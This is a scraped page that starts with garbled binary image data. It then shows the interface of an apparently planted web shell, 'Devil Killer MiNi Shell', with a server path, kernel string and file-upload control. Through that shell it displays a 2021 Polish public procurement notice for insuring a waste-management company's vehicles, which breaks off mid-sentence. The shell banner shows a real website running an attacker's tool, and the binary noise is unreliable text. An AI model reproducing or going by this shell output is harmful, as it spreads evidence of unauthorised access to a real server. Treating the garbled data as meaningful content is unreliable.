JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210914/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210914/0017950901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ubezpieczenie pojazdów użytkowanych przez ZGOK Sp. z o.o. w Olsztynie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD GOSPODARKI ODPADAMI KOMUNALNYMI SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510734049</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lubelska 53</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">10-410</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zgok.olsztyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://zgok.olsztyn.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Środowisko</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ubezpieczenie pojazdów użytkowanych przez ZGOK Sp. z o.o. w Olsztynie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f2b01ee7-146a-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00179509</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zgok-olsztyn.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zgok-olsztyn.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub<br/>oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków przewidzianych w<br/>ustawie PZP, odbywa się przy użyciu środków komunikacji elektronicznej. Komunikacja ustna<br/>dopuszczalna jest w odniesieniu do informacji, które nie są istotne, w szczególności nie dotyczą<br/>ogłoszenia o zamówieniu lub SWZ, a także ofert. Postępowanie prowadzone jest przy użyciu środków<br/>komunikacji elektronicznej. W postępowaniu o udzielenie zamówienia komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy Przetargowej Zakładu Gospodarki<br/>Odpadami Komunalnymi Sp. z o.o. w Olsztynie (dalej: ZGOK), dostępnej pod adresem:<br/>https://zgokolsztyn.<br/>logintrade.net/rejestracja/ustawowe.html oraz poczty elektronicznej:<br/>zamowienia@zgok.olsztyn.pl. Złożenie, wycofanie lub zmiana oferty następują wyłącznie za<br/>pośrednictwem platformy. Instrukcje korzystania z Platformy Przetargowej dotyczące w szczególności<br/>logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności<br/>podejmowanych w niniejszym postępowaniu przy użyciu ww. Platformy znajdują się w zakładce<br/>„Instrukcje dla Wykonawców” na stronie internetowej pod adresem<br/>https://zgokolsztyn.logintrade.net/rejestracja/instrukcje.html. Wymagania sprzętowo – aplikacyjne<br/>umożliwiające użycie środków komunikacji elektronicznej i pracę na Platformie Przetargowej ZGOK:<br/>dowolny<br/>komputer klasy PC z systemem operacyjnym Windows oraz dostępem do sieci Internet, zainstalowane<br/>oprogramowanie Acrobat Reader do obsługi dokumentów w formacie PDF, które można pobrać<br/>bezpłatnie ze strony internetowej http://get.adobe.com/reader/. Dopuszczalne przeglądarki internetowe:<br/>Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11, Google Chrome 31,<br/>Mozilla Firefox 26, Opera 18. Pozostałe wymagania techniczne: dostęp do sieci Internet, obsługa przez<br/>przeglądarkę protokołu XMLHttpRequest – ajax, włączona obsługa JavaScript, zalecana szybkość<br/>łącza internetowego powyżej 500 KB/s, zainstalowany Acrobat Reader, zainstalowane środowisko<br/>Java – Java SE Runtime Environment 6 Update 24 lub nowszy. Oświadczenia lub dokumenty<br/>przekazywane za pośrednictwem środka komunikacji elektronicznej przesyła się w formatach danych<br/>określonych w przepisach wydanych na podstawie §2 ust. 1 i 2 Rozporządzenia Prezesa Rady<br/>Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz. 2452).<br/>Równocześnie Zamawiający rekomenduje format danych przesyłanych plików: .pdf. W celu ewentualnej kompresji danych, Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip, 7Z.<br/>Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem Platformy Przetargowej<br/>ZGOK. Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych za pomocą<br/>poczty elektronicznej, na adres e-mail: zamowienia@zgok.olsztyn.pl. Sposób sporządzenia<br/>dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz<br/>rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy (Dz. U. z 2020 poz. 2415). Z uwagi na ograniczoną ilość znaków,<br/>pozostałe informacje zawarte są w Specyfikacji Warunków Zamówienia dostępnej na Platformie<br/>przetargowej ZGOK https://zgok.olsztyn.logintrade.net/rejestracja/ustawowe.html.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) Administratorem danych osobowych (dalej: „Administrator”) jest Zakład Gospodarki Odpadami<br/>Komunalnymi Spółka z ograniczoną odpowiedzialnością, adres: 10-410 Olsztyn, ul. Lubelska 53,<br/>zarejestrowana w dniu 8 marca 2002 roku, pod numerem 0000097877, w Rejestrze Przedsiębiorców<br/>Krajowego Rejestru Sądowego, dla której akta rejestrowe prowadzi Sąd Rejonowy w Olsztynie, VIII<br/>Wydział Gospodarczy KRS, numer NIP 739-29-54-369, REGON 510734049, kapitał zakładowy 29 993<br/>500 zł.<br/>2) W sprawach z zakresu ochrony danych osobowych mogą Państwo kontaktować się z Inspektorem<br/>Ochrony Danych pod adresem e-mail: iod@zgok.olsztyn.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie ww. zamówienia publicznego;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień<br/>publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.), dalej „ustawa Pzp”;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy, wliczając okres rękojmi i gwarancji<br/>plus okres przedawnienia roszczeń;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Informuje się, że posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; może<br/>zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności sprecyzowania nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych;<br/>przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz<br/>jego załączników;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO tj. prawo do<br/>ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>2. Nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGOK/TP2/35/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> o.o. w Olsztynie (dalej ZGOK).<br/>2. Zamawiający w ramach niniejszego zamówienia dopuszcza skorzystanie z prawa opcji, o<br/>którym mowa w art. 441 ustawy PZP. Przewiduje się opcję dotyczącą możliwości skorzystania z<br/>ubezpieczenia pojazdów leasingowych ujętych w pozycjach 28 i 29 Załącznika nr 7 Wykaz<br/>pojazdów, tj. pojazdu VOLKSWAGEN CADDY 1,4 TSI COMFORTLINE DSG nr rej. NO 6043T i<br/>pojazdu VOLKSWAGEN TRANSPORTER T6 TDI L2H1 nr rej. NO 0275V. Zamawiający może<br/>skorzystać z prawa opcji w całości lub części. Skorzystanie z zakresu objętego opcją<br/>uzależnione będzie od możliwość finansowych Zamawiającego.<br/>3. Szczegółowy opis przedmiotu zamówienia oraz warunki współpracy zostały opisane w<br/>Załączniku nr 6 pn. Projektowane postanowienia umowy oraz Załączniku nr 5 pn. Opis<br/>przedmiotu zamówienia (OPZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66514110-0 - Usługi ubezpieczeń pojazdów mechanicznych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający w ramach niniejszego zamówienia dopuszcza skorzystanie z prawa opcji, o którym mowa w art. 441 ustawy PZP. Przewiduje się opcję dotyczącą możliwości skorzystania z<br/>ubezpieczenia pojazdów leasingowych ujętych w pozycjach 28 i 29 Załącznika nr 7 Wykaz<br/>pojazdów, tj. pojazdu VOLKSWAGEN CADDY 1,4 TSI COMFORTLINE DSG nr rej. NO 6043T i<br/>pojazdu VOLKSWAGEN TRANSPORTER T6 TDI L2H1 nr rej. NO 0275V. Zamawiający może<br/>skorzystać z prawa opcji w całości lub części. Skorzystanie z zakresu objętego opcją<br/>uzależnione będzie od możliwość finansowych Zamawiającego. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1. W związku z art. 305 pkt 1) Zamawiający przewiduje udzielenie zamówień, o których<br/>mowa w art. 214 ust. 1 pkt 7 ustawy PZP.<br/>2. Zgodnie z brzmieniem ww. przepisu: Zamawiający może udzielić ww. zamówień w okresie 3 lat od<br/>dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług (tj. wyłonionemu w<br/>niniejszym postępowaniu), zamówienia polegającego na powtórzeniu podobnych usług, jeżeli takie<br/>zamówienie było przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest<br/>zgodne z jego przedmiotem oraz całkowita wartość tego zamówienia została uwzględniona przy<br/>obliczaniu jego wartości<br/>3. Zamówienia, o których mowa w ust. 1 zostaną udzielone, jeżeli będą zachodziły okoliczności<br/>powodujące potrzebę ich udzielenia. Ww. zamówienia zostaną udzielone na warunkach określonych<br/>dla zamówienia podstawowego opisanych w niniejszej SWZ oraz zgodnie z aktualnymi przepisami<br/>prawnymi w tym zakresie.<br/>4. Ww. zamówienia mogą zostać udzielone:<br/>1) do wartości 10 000,00 zł netto, co stanowi 2 342,30 euro;<br/>2) po przeprowadzeniu procedury przewidzianej dla zamówienia z wolnej ręki, przy czym zlecenie<br/>zamówienia, tj. zawarcie umowy, poprzedzone będzie stosownym zaproszeniem do negocjacji oraz<br/>negocjacjami;<br/>3) każdorazowo negocjacje dotyczą oferowanej przez Wykonawcę ceny oraz warunków realizacji<br/>zamówienia w kontekście przyjętego opisu przedmiotu zamówienia i warunków przyszłej umowy o<br/>zamówienie publiczne;<br/>4) Wykonawca będzie musiał wykazać spełnienie warunków udziału w postępowaniu oraz brak<br/>podstaw do wykluczenia poprzez złożenie dokumentów, jak w niniejszym postępowaniu przetargowym.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Warunki ubezpieczenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia publicznego mogą ubiegać się Wykonawcy, którzy:<br/>1.1.	nie podlegają wykluczeniu;<br/>1.2.	spełniają warunki udziału w postępowaniu dotyczące:<br/>1.2.1.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca spełni warunek, jeżeli wykaże, że posiada aktualne uprawnienia do wykonywania działalności ubezpieczeniowej w zakresie wszystkich grup ryzyk objętych przedmiotem zamówienia.<br/>2.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa powyżej, jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. <br/>3.	W przypadku, o którym mowa w ust. 2, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	w celu potwierdzenia braku podstaw wykluczenia - Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia poprzestając na ocenie braku podstaw wykluczenia na podstawie oświadczenia, o którym mowa w art. 125 ust. 1 ustawy PZP, w postaci Załącznika nr 2 do niniejszej SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2)	w celu potwierdzenia spełniania warunków udziału w postępowaniu - na potwierdzenie spełniania warunku, o którym mowa w Rozdziale XII ust. 1 pkt 1.2. ppkt 1.2.1. Wykonawca składa:<br/>aktualne zezwolenie Komisji Nadzoru Finansowego lub Ministra Finansów w zakresie wszystkich grup ryzyk objętych przedmiotem zamówienia zgodnie z ustawą z dnia 11 września 2015 roku o działalności ubezpieczeniowej i reasekuracyjnej (Dz. U. 2021.1130 tj. z 15.06.2021). W przypadku Wykonawców mających siedzibę poza terytorium Rzeczypospolitej Polskiej – zezwolenie organu nadzoru kraju, w którym Wykonawca ma siedzibę, również w zakresie wszystkich grup ryzyk objętych przedmiotem zamówienia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	W celu potwierdzenia zgodności oferowanych usług z wymaganiami Zamawiającego określonymi w Opisie Przedmiotu Zamówienia oraz z wymaganiami związanymi z realizacją zamówienia, Zamawiający żąda złożenia wraz z ofertą poniższych dokumentów: <br/>1)	Deklaracja fakultatywnych warunków ubezpieczenia (Załącznik nr 4),<br/>2)	Ogólne warunki ubezpieczenia dla poszczególnych ryzyk. <br/>2.	Przedmiotowe środki dowodowe wskazane w ust. 1, Wykonawca zobowiązany jest złożyć wraz z ofertą.<br/>3.	Oferta musi uwzględniać cały zakres ubezpieczenia wymagany przez Zamawiającego, tj. musi zawierać wszystkie rodzaje ubezpieczeń i obejmować wszystkie przedmioty ubezpieczenia wymienione w Załączniku nr 5 (OPZ) oraz Załączniku nr 7 (Wykaz pojazdów). Przedmiotowe środki dowodowe służą potwierdzeniu, że oferowany przez Wykonawcę przedmiot zamówienia spełnia minimalne wymagania Zamawiającego. W przypadku niespełnienia któregokolwiek z warunków określonych jako wymagane w OPZ, oferta Wykonawcy zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5 ustawy PZP. <br/>4.	Jeżeli Wykonawca nie złoży przedmiotowego środka dowodowego, 